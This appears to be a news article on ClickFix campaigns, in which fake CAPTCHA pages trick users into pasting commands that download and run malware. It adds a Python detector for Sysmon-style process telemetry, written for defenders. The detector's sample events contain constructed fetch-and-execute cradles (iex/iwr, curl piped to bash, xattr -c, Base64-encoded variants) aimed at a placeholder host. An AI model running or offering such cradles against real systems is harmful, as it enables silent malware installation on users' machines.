Ripple effect: With the holiday travel season approaching, a period that typically brings a surge in booking-related communications, the likelihood of renewed phishing attempts remains high. Microsoft and other vendors have updated their endpoint protection tools to detect known ClickFix command patterns, but these defenses remain largely reactive: they catch the command lines already seen, not the next variation. As long as social-engineering lures appear credible and require no file download, preventing infection will continue to depend primarily on user vigilance, backed by monitoring of what users paste into PowerShell and shell sessions.

A year of escalating social-engineering attacks has produced one of the most efficient infection chains observed to date. Known as ClickFix, this method requires only that a user follow a brief set of instructions (typically copying and pasting a single line of text into a system terminal). Once the command executes, the user's machine – Mac or PC – contacts a remote server controlled by the attackers, downloads malware, and executes it silently. No visible file transfer, pop-up, or security alert interrupts the process.
ClickFix campaigns exploit the human tendency to trust familiar sources and to underestimate the risks of executing a text command. Victims often encounter the malicious prompt after clicking a realistic-looking link sent from a compromised hotel or booking account, or after landing on a poisoned search result.
The page typically displays a CAPTCHA or similar verification, styled to look like a Cloudflare human check. Visitors are instructed to copy a short string into a terminal, an action that seems harmless but sidesteps the controls that act at download time (browser download warnings, mail-gateway attachment scanning), because nothing is downloaded until the user's own shell fetches it.
Once executed, the string triggers a remote script that silently fetches and installs malicious payloads. CrowdStrike researchers identified one such campaign targeting macOS devices with a Mach-O executable. Analysis revealed that the sample deployed an infostealer known as Shamos, alongside components that enlisted infected hosts into botnets and modified macOS settings to maintain persistence across reboots. The attack sidestepped Apple's Gatekeeper checks, which verify the signature and notarization of apps downloaded through the normal browser path, by fetching and launching the payload through native command-line tools, so the download path that triggers those checks was never used.
CrowdStrike noted that the appeal for eCrime actors lies in the combination of precise social engineering and inherent system trust. Because the commands originate from within the operating system environment itself, rather than from an external installer, many endpoint protections fail to detect them.
This approach exemplifies the "living off the land" principle, known among defenders as LOLBin (living-off-the-land binary) abuse. The first stage relies solely on built-in, trusted utilities such as PowerShell on Windows or Bash on macOS to carry out malicious activity. Because that stage writes no new binary to disk, it evades signature-based detection almost entirely; only the payload it later fetches, if and when it lands on disk, gives a scanner something to match.
Researchers at Sekoia observed similar campaigns targeting Windows users via compromised hospitality accounts. In that variant, attackers took over genuine Booking.com or hotel management dashboards and used them to message upcoming guests with believable reservation details.
Recipients were then directed to counterfeit CAPTCHA pages that were indistinguishable from legitimate content delivery network checks. Copying the displayed text string into a Windows terminal caused the machine to be infected with a remote-access Trojan known as PureRAT.
For victims, the credibility of the communication proved decisive. The requests came from accounts already recognized as legitimate by their systems, lowering suspicion and boosting compliance. Once infected, systems could be leveraged to harvest saved passwords, cryptocurrency wallet credentials, or authentication tokens used in corporate environments.
Further research from Push Security revealed that newer ClickFix variants detect the operating system before delivering their payload. The same malicious webpage can serve a Windows binary or a macOS Mach-O executable depending on the visitor's environment.
Microsoft's investigation confirmed the use of adaptive scripts that apply LOLBin methods across platforms. The lure itself runs inside the browser sandbox, which is why it cannot infect the machine on its own; the damage happens once the user pastes the command into a terminal shell, outside the browser's protections. Because most antivirus solutions monitor file activity rather than in-memory command execution, these scripts often evade initial containment.
Attackers also encode command payloads using Base64. This is obfuscation, not encryption: it hides the actual command from human view while the shell decodes and runs it unchanged. When pasted from the browser into the terminal, the decoded command fetches further code from the attacker's server and runs it, giving the operator remote code execution without additional clicks or permission prompts.
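The Base64 layer and the living-off-the-land download cradle described above are what a process-creation detection has to peel apart. As an added example, not code from the article or from Microsoft, CrowdStrike, Sekoia or Push Security, the Python below decodes PowerShell's -EncodedCommand form (Base64 of UTF-16LE text) and the shell-side `echo … | base64 -d` form, then scores both the outer command line and the decoded layer against a small set of assumed indicators: in-memory execution, a remote fetch, output piped into a shell, quarantine-attribute removal with xattr. The indicator list, the sample events and the example.invalid URLs are constructed for this example and are not vendor detection content or real telemetry.

```python
"""Flag ClickFix-style paste-to-terminal commands in process-creation telemetry.

Added example, not code from the article or from any vendor named in it.
The command lines in SAMPLE_EVENTS are constructed to resemble the patterns
the article describes; the URLs use the reserved example.invalid domain.
"""
import base64
import re

# Indicators of a first-stage "living off the land" download cradle.
# Assumed example indicators, not a vendor's detection content.
CRADLE_PATTERNS = [
    (r"\biex\b|invoke-expression", "PowerShell in-memory execution"),
    (r"\b(invoke-webrequest|iwr|downloadstring|curl|wget)\b", "remote fetch"),
    (r"\|\s*(ba|z)?sh\b", "output piped into a shell"),
    (r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)", "quarantine attribute stripped"),
    (r"\bmshta\b.*https?://", "mshta with remote URL"),
]

# powershell -EncodedCommand (any unambiguous prefix) takes Base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# echo <base64> | base64 -d | sh is the shell-side equivalent.
B64_SHELL = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode|-D)\b", re.I)


def split_layers(cmdline):
    """Return (outer, decoded). outer has the Base64 blob replaced by a marker;
    decoded is the plaintext layer, "" if the blob was malformed, None if no
    encoded layer was present."""
    for rx, codec in ((ENC_FLAG, "utf-16-le"), (B64_SHELL, "utf-8")):
        m = rx.search(cmdline)
        if m:
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode(codec)
            except (ValueError, UnicodeDecodeError):
                decoded = ""  # malformed blob: still report the encoding attempt
            outer = cmdline[:m.start(1)] + "<base64>" + cmdline[m.end(1):]
            return outer, decoded
    return cmdline, None


def analyze(cmdline):
    """List the indicators found in the command line and in its decoded layer."""
    outer, decoded = split_layers(cmdline)
    hits = []
    if decoded is not None:
        hits.append("base64-encoded command")
    for text in (outer, decoded or ""):
        for pattern, label in CRADLE_PATTERNS:
            if label not in hits and re.search(pattern, text, re.I):
                hits.append(label)
    return hits


def is_clickfix_like(cmdline):
    """Alert on two or more indicators; a lone curl or iwr is routine admin work."""
    return len(analyze(cmdline)) >= 2


def _encode_powershell(script):
    """Build a -EncodedCommand blob the way PowerShell expects it (UTF-16LE, no BOM)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -Command Get-Service",  # benign admin use
    "powershell.exe -w hidden -enc "
    + _encode_powershell("iex (iwr 'http://example.invalid/a.txt').Content"),  # Windows style
    '/bin/bash -c "curl -fsSL http://example.invalid/s.sh -o /tmp/s; '
    'xattr -c /tmp/s; bash /tmp/s"',  # macOS style, quarantine attribute stripped
    "curl -O https://example.invalid/report.pdf",  # benign download
    'bash -c "echo '
    + base64.b64encode(b"curl -fsSL http://example.invalid/s.sh | bash").decode("ascii")
    + ' | base64 -d | bash"',  # shell-side Base64 layer
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = "ALERT" if is_clickfix_like(event) else "ok   "
        print(verdict, analyze(event), event[:60])
```

The two-indicator threshold is the point worth noting: a bare `curl` or `Invoke-WebRequest` is everyday administration, while a remote fetch combined with an encoded layer, a pipe into a shell, or `xattr -c` is the shape of a paste-to-terminal cradle. Feed it the command-line field of Sysmon event 1, `auditd` execve records, or Endpoint Security process events rather than the samples above.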
ClickFix exemplifies a broader evolution in social engineering, where technical barriers are replaced by behavioral manipulation. The deception relies less on exploiting unpatched software vulnerabilities and more on exploiting user trust and habits. Many users have learned to avoid dubious links, yet far fewer question instructions involving local system utilities. The result is a threat vector that outpaces public awareness and renders many conventional defenses ineffective.
Hackers found a way to weaponize CAPTCHA pages, and it's incredibly effective